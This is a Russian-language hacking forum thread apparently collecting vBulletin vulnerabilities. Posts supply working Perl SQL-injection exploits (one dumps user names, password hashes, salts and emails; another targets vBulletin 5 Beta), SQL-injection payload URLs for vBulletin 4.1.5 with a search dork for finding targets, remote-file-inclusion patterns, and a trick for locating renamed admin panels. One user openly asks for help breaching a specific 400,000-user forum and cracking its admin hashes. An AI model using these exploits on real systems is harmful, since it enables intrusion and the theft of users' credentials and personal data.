Форумы [Обзор уязвимостей vBulletin]

Discussion in 'Уязвимости CMS/форумов' started by bandera, 19 Aug 2006.

  1. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    На ветке vBulletin 3.8.x присутствует SQL инъекция в файле eggavatar.php, он находится в корневой директории сайта. Если при обращении к site/eggavatar.php сайт выдал не 404 Not Found, то воспользуйтесь сплоитом:
    PHP:
    #!/usr/bin/env perl  
    use LWP::UserAgent;  
    sub banner{  
    print 
    "###################################\n";  
    print 
    "############ DSecurity ############\n";  
    print 
    "###################################\n";  
    print 
    "# Email:dsecurity.vn[at]gmail.com #\n";  
    print 
    "###################################\n";  
    }  
    if(@
    ARGV<5){  
        print 
    "Usage: $0 address username password number_user sleeptime\n";  
        print 
    "Example: $0 http://localhost/vbb test test 10 10\n";  
        exit();  
    }  
    $ua=LWP::UserAgent->new();  
    $ua->agent("DSecurity");  
    $ua->cookie_jar({});  
    sub login(@){  
        
    my $username=shift;  
        
    my $password=shift;  
        
    my $req HTTP::Request->new(POST => $ARGV[0].'/login.php?do=login');  
        
    $req->content_type('application/x-www-form-urlencoded');  
        
    $req->content("vb_login_username=$username&vb_login_passwor=$password&s=&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&do=login&vb_login_md5password=&vb_login_md5password_utf=");  
        
    my $res $ua->request($req);  
    }  
    sub v_request{  
        
    #Declare  
        
    $print $_[0];  
        
    $select $_[1];  
        
    $from $_[2];  
        
    $where $_[3];  
        
    $limit $_[4];  
        
    $sleep $ARGV[4];  
        if (
    $from eq '') {$from 'information_schema.tables';}  
        if (
    $where eq '') {$where '1';}  
        if (
    $limit eq '') {$limit '0';}  
        if (
    $sleep eq '') {$sleep '10';}  
           
        
    # Create a request  
        
    my $req HTTP::Request->new(POST => $ARGV[0].'/eggavatar.php');  
        
    $req->content_type('application/x-www-form-urlencoded');  
        
    $req->content('do=addegg&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&eggavatar=1'."' and (SELECT 1 FROM(SELECT COUNT(*),CONCAT((select $select  from  $from  WHERE $where limit $limit,1),FLOOR(RAND(1)*3))foo FROM information_schema.tables GROUP BY foo)a)-- -'&uid=1&pid=1");  
        
    # Pass request to the user agent and get a response back  
        
    my $res $ua->request($req);  
        
    #print $res->content;  
        
    if($res->content =~ /(MySQL Error)(.*?)'(.*?)0'(.*)/)  
            {
    $test = $3};  
        
    sleep($sleep);  
        return 
    $print.$test."\n";  
    }  
    &
    banner;  
    print 
    "\n################################################  ##################################################  ###########\n";  
    print 
    "# EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability                                                 #\n";  
    print 
    "# Date:06-03-2011                                                                                           #\n";  
    print 
    "# Author: DSecurity                                                                      #\n";  
    print 
    "# Software Link: http://www.vbteam.info/vb-3-8-x-addons-and-template-modifications/19079-tk-egg-avatar.html #\n";  
    print 
    "# Version: 2.3.2                                                                                            #\n";  
    print 
    "# Tested on: vBulletin 3.8.0                                                                                #\n";  
    print 
    "##################################################  ##################################################  #########\n";  
       
    #login  
    login($ARGV[1],$ARGV[2]);  
    #Foot print  
    print v_request('MySQL version: ','@@version');  
    print 
    v_request('Data dir: ','@@datadir');  
    print 
    v_request('User: ','user()');  
    print 
    v_request('Database: ','database()');    
    #Get user  
    for($i=1;$i<=$ARGV[3];$i++){  
        print 
    "-----------------------------------------\n";  
        print 
    $id v_request('ID: ','userid','user','1',$i-1);  
        if(
    $id =~ /(ID:)s(.*)/){  
            print 
    v_request('Group: ','usergroupid','user','userid='.$2);  
            print 
    v_request('Username: ','username','user','userid='.$2);  
            print 
    v_request('Password: ','password','user','userid='.$2);  
            print 
    v_request('Salt: ','salt','user','userid='.$2);  
            print 
    v_request('Email: ','email','user','userid='.$2);  
        }  
                   
    }  
     
  2. warhamer2012

    warhamer2012 New Member

    Joined:
    2 Oct 2012
    Messages:
    36
    Likes Received:
    0
    Reputations:
    0
    Мужики, подскажите насчет vbulletin 4.0.2 Remote File Inclusion
    Кто-то пробовал? Все облазил-нашел только следующее
    # Exploit :
    #
    # http://www.site.com/path/includes/class_block.php?classfile=[shell code]
    #
    # http://www.site.com/path/vb/vb.php?filename=[shell code]
    #
    # http://www.site.com/path/packages/vbattach/attach.php?include_file=[shell code]


    Но не прокатывает на ни на цели, ни на локалке. Что я делаю не так? Или это фейк???
     
  3. e17

    e17 Member

    Joined:
    8 Feb 2013
    Messages:
    47
    Likes Received:
    57
    Reputations:
    81
    Недавно искал новый сплоит под vBulletin.
    Забрел на сайт 1337day.com и меня заинтересовал следующий топик 0дея:
    Code:
    http://1337day.com/exploit/description/20417
    
    Описание гласило:
     
  4. e17

    e17 Member

    Joined:
    8 Feb 2013
    Messages:
    47
    Likes Received:
    57
    Reputations:
    81
    Эксплоит оказался не рабочим, но что-то делать было нужно.
    Мой вгляд пал на только что обновленную булку до версии: 4.1.5

    Code:
    mmoru.com
    
    Зарегистрировавшись , я обратил внимание что на самом сайте стоит движек vBuletin на котором возможно писать статьи.
    Проверяя переменные наткнулся на sq-injection , как в последствии оказалось присущюю всем vbulletin 4.1.5.

    Название: Уязвимость в vBulletin 4.1.5

    Dork: Powered by Powered by vBulletin 4.1.5

    Условия: Аккаунт на форуме. Разрешение на прикрепление файлов к сообщениям/темам (attachments)

    Регистрируемся -> заходим на форум -> жмем создать тему или если стоит борд, то можно выбрать создать статью (второй вариант чаще срабатывал) -> в самом низу ищем Вложения "Управление вложениями" -> Открываем окно и в параметр "values[f]" вставляем наш SQL запрос.

    Пример:
    PHP:
    :
    http://site.com/board/newattachment.php?do=assetmanager&values[f]=-1599+or(1,2)=(select*from(select+name_const(version(),1),name_const(version(),1))a)&contenttypeid=18&poststarttime=1360663633&posthash=4f5c850593e10c5450d9e880d58a56d8&insertinline=1
    После чего видим стандартную ошибку БД форума, следовательно открываем исходный код страницы и видим:

    PHP:
    <!-- 
    Database error in vBulletin 4.1.5

    Invalid SQL

                 
    SELECT 
                     permissionsfrom
    hiddensetpublishpublishdateuserid 
                 FROM ds23fSDdfsdf_cms_node 
                 WHERE 
                     nodeid 
    = -1599 or(1,2)=(select*from(select name_const(version(),1),name_const(version(),1))a); 

    MySQL Error   Duplicate column name '5.1.49-3' 
    Error Number  1060 
    Request Date  
    TuesdayFebruary 12th 2013 01:12:33 PM 
    Error Date    
    TuesdayFebruary 12th 2013 01:12:33 PM 
    Script        
    http://site.com/board/newattachment.php?do=assetmanager&amp;values[f]=-1599%20or(1,2)=(select*from(select%20name_const(version(),1),name_const(version(),1))a)&amp;contenttypeid=18&amp;poststarttime=1360663633&amp;posthash=4f5c850593e10c5450d9e880d58a56d8&amp;insertinline=1 
    Referrer      :  
    IP Address    127.0.0.1 
    Username      
    Hacker 
    Classname     
    vB_Database 
    MySQL Version 
    :  
    -->  


    С вами были Piv8Team (priv8.ru)
     
    2 people like this.
  5. Ups

    Ups Member

    Joined:
    11 Apr 2011
    Messages:
    113
    Likes Received:
    12
    Reputations:
    0
    vBulletin 5 Beta XX SQLi 0day

    Code:
    #!/usr/bin/perl
    use LWP::UserAgent;
    use HTTP::Cookies;
    use HTTP::Request::Common;
    use MIME::Base64;
    system $^O eq 'MSWin32' ? 'cls' : 'clear';
    print "
    +===================================================+
    |           vBulletin 5 Beta XX SQLi 0day           |
    |              Author: Orestis Kourides             |
    |             Web Site: www.cyitsec.net             |
    +===================================================+
    ";
     
    if (@ARGV != 5) {
        print "\r\nUsage: perl vb5exp.pl WWW.HOST.COM VBPATH URUSER URPASS MAGICNUM\r\n";
        exit;
    }
     
    $host		= $ARGV[0];
    $path		= $ARGV[1];
    $username	= $ARGV[2];
    $password	= $ARGV[3];
    $magicnum	= $ARGV[4];
    $encpath	= encode_base64('http://'.$host.$path);
    print "[+] Logging\n";
    print "[+] Username: ".$username."\n";
    print "[+] Password: ".$password."\n";
    print "[+] MagicNum: ".$magicnum."\n";
    print "[+] " .$host.$path."auth/login\n";
    my $browser = LWP::UserAgent->new;
    my $cookie_jar = HTTP::Cookies->new;
    my $response = $browser->post( 'http://'.$host.$path.'auth/login',
        [
    		'url' => $encpath,
    		'username' => $username,
    		'password' => $password,
    	],
    	Referer => 'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'',
    	User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
    );
    $browser->cookie_jar( $cookie_jar );
    my $browser = LWP::UserAgent->new;
    $browser->cookie_jar( $cookie_jar );
    print "[+] Requesting\n";
    my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
        [
    		'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1=1',
    	],
    	User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
    );
    $data = $response->content;
    if ($data =~ /(#((\\.)|[^\\#])*#)/) { print '[+] Version: '.$1 };
    print "\n";
    exit 1;
    
     
  6. Oro4imaru

    Oro4imaru New Member

    Joined:
    17 Jul 2010
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    vBulletin® Version 4.1.5
    http://www.youtube.com/watch?v=k9xe55gq2fc
     
    #146 Oro4imaru, 20 Oct 2013
    Last edited by a moderator: 21 Oct 2014
  7. wauffmannn

    wauffmannn New Member

    Joined:
    4 Nov 2013
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Обход ограничений безопасности в vBulletin

    Дата публикации: 10.10.2013
    Дата изменения: 10.10.2013
    Всего просмотров: 1104
    Опасность: Высокая
    Наличие исправления: Инстуркции по устранению
    Количество уязвимостей: 1
    CVSSv2 рейтинг: (AV:N/AC:L/Au:N/C:p/I:p/A:p/E:H/RL:W/RC:C) = Base:7.5/Temporal:7.1
    CVE ID: Нет данных
    Вектор эксплуатации: Удаленная
    Воздействие: Обход ограничений безопасности
    CWE ID: Нет данных
    Наличие эксплоита: Активная эксплуатация уязвимости
    Уязвимые продукты: vBulletin 4.x
    vBulletin 5.x

    Уязвимые версии: vBulletin версии 4.x, 5.x

    Описание:
    Уязвимость позволяет удаленному пользователю получить административный доступ к приложению.

    Уязвимость существует из-за неизвестной ошибки в сценарии /install/upgrade.php. Удаленный пользователь может с помощью специально сформированного запроса создать новую административную учетную запись и получить полный контроль над приложением.

    Уязвимость активно эксплуатируется в настоящее время.

    URL производителя: http://www.vbulletin.com/

    Решение: Способов устранения уязвимости не существует в настоящее время. В качестве временно решения производитель рекомендует удалить установочные директории /install/ или /core/install/.

    Ссылки:
    http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/3991423-potential-vbulletin-exploit-vbulletin-4-1-vbulletin-5
    http://www.vbulletin.org/forum/showthread.php?p=2443431



    где взять POC?
     
  8. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    там одной булки не достаточно, нужна читалка на серваке

    более подробно тут
     
    _________________________
  9. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    да. http://www.1337day.com/exploit/17824
     
    #149 OxoTnik, 21 Jan 2014
    Last edited by a moderator: 21 Oct 2014
  10. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Небольшая заметка о "быстром" поиске админки.

    В случае, когда у Вас есть администраторский аккаунт, но нет доступа в админку, по причине "админ захотел поиграть в кошки-мышки и переименовал админку", дабы не брутить и не нагружать сервер кучей бесполезных логов, поможет следующий способ:

    заходим в профиль любого пользователя (forum/member.php?u=2), видим кнопку "Edit Profile / Редактировать учётную запись". По ссылке - как раз адрес админки.

    VB >= 2.8.6

    Другие версии не проверял.
     
    _________________________
    grimnir likes this.
  11. eman

    eman New Member

    Joined:
    7 Nov 2010
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    Я уже подобное писал выше, только не стоит забывать, что данный способ работает если переименованная админка прописана в config.php
    Если она не прописана в конфиге то не найти.
     
  12. Reset_

    Reset_ Member

    Joined:
    18 Nov 2008
    Messages:
    87
    Likes Received:
    19
    Reputations:
    4
    Залили другу через шелл такую штуку Vbulletin activity Page Denial of Service,
    сам не проверял кому то может пригодится

     
  13. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    _________________________
    yarbabin likes this.
  14. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    vBulletin 5 PreAuth RCE writeup
     
    _________________________
    M_script likes this.
  15. indigo666

    indigo666 New Member

    Joined:
    25 Jan 2013
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Кто-нибудь знает уязвимости в VB 3.8.7 / 4.2.x?
     
  16. user6334

    user6334 Member

    Joined:
    29 Jun 2015
    Messages:
    296
    Likes Received:
    17
    Reputations:
    12
    у меня так выводятся только кавычки, пробовал много
     
  17. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    https://github.com/rezasp/vbscan
    обновился
     
    _________________________
  18. EvilSQL

    EvilSQL Banned

    Joined:
    12 Jan 2016
    Messages:
    32
    Likes Received:
    12
    Reputations:
    3
    В курсе кто про Vbulliten 2.2.9 ? нашел там 4 SQL Injection но они все time based не могу раскрутить да и сурсов форума не найти.
    PS там еще крутится 3.7.3 и аккаунт модератора есть.
    на 3.7.3 admincp basic авторизация.
    на 2.2.9 прост admincp шелл думаю залить труда не составит дырявый форум как друшлак

    Опыт у меня большой, но ска скулю не могу раскрутить поможет, кто получить доступ?
    PS,s 400 000 пользователей.

    PS.S У меня сервис HashDB расшифровать не составит труда хеши админов.
     
  19. GrAmOzEkA

    GrAmOzEkA Elder - Старейшина

    Joined:
    25 Jun 2006
    Messages:
    234
    Likes Received:
    76
    Reputations:
    29
  20. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    https://pste.eu/p/PPQZ.html

    Странно, что используют логи сервера, по моему инклуд временных файлов будет намного универсальнее.
     
    t0ma5 and joelblack like this.